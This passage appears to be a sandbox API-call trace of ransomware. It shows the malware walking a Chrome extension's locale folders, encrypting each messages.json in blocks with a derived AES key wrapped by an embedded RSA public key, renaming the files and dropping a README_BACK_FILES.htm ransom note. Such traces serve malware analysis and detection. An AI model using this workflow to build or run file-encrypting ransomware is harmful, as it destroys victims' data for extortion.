dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.182] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.182] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.182] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.182] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.182] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.182] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.182] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.182] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.182] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.182] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.182] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.182] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.182] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.183] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.183] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.183] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.183] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.183] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.183] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.183] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.183] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.183] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.183] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.183] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.183] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.183] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.183] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.183] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.183] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.183] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.183] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.184] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.184] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.184] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.184] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.184] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.184] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.184] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.184] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.184] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.184] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.184] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.185] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.185] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x30b, lpOverlapped=0x0) returned 1 [0264.185] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x30b, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x310) returned 1 [0264.185] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x310, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x310, lpOverlapped=0x0) returned 1 [0264.185] CloseHandle (hObject=0x5d5c) returned 1 [0264.185] CloseHandle (hObject=0x5d60) returned 1 [0264.185] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json"), bFailIfExists=0) returned 1 [0264.192] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json", dwFileAttributes=0x0) returned 1 [0264.192] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json.gsg")) returned 1 [0264.193] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json.fuck")) returned 1 [0264.195] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0264.195] CryptDestroyKey (hKey=0x2e7da00) returned 1 [0264.195] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0264.195] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0264.195] FindClose (in: hFindFile=0x2e7fd40 | out: hFindFile=0x2e7fd40) returned 1 [0264.195] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\readme_back_files.htm")) returned 0xffffffff [0264.195] AreFileApisANSI () returned 1 [0264.195] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0264.195] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0264.196] GetFileType (hFile=0x5d64) returned 0x1 [0264.196] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0264.197] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0264.197] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0264.197] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0264.197] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0264.197] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0264.197] GetLastError () returned 0x0 [0264.197] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json")) returned 0x20 [0264.197] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json", dwFileAttributes=0x80) returned 1 [0264.198] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0264.199] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0264.199] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0264.200] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0264.202] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0264.202] lstrlenA (lpString="hdyBJCVtAqmxyhbnkFvIscGGzMlQm") returned 29 [0264.202] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb300, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0264.202] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7de00) returned 1 [0264.202] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0264.202] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0264.202] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e76540) returned 1 [0264.203] CryptImportPublicKeyInfo (in: hCryptProv=0x2e76540, dwCertEncodingType=0x1, pInfo=0x2eaefc0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eaeff0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eaeff8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7ea80) returned 1 [0264.203] CryptEncrypt (in: hKey=0x2e7ea80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0264.203] CryptEncrypt (in: hKey=0x2e7ea80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e75b28*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e75b28*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0264.203] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e75b28*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e75b28*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0264.204] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.215] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.215] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.217] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.217] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.217] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.217] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.217] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.217] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.217] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.217] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.218] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.218] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, 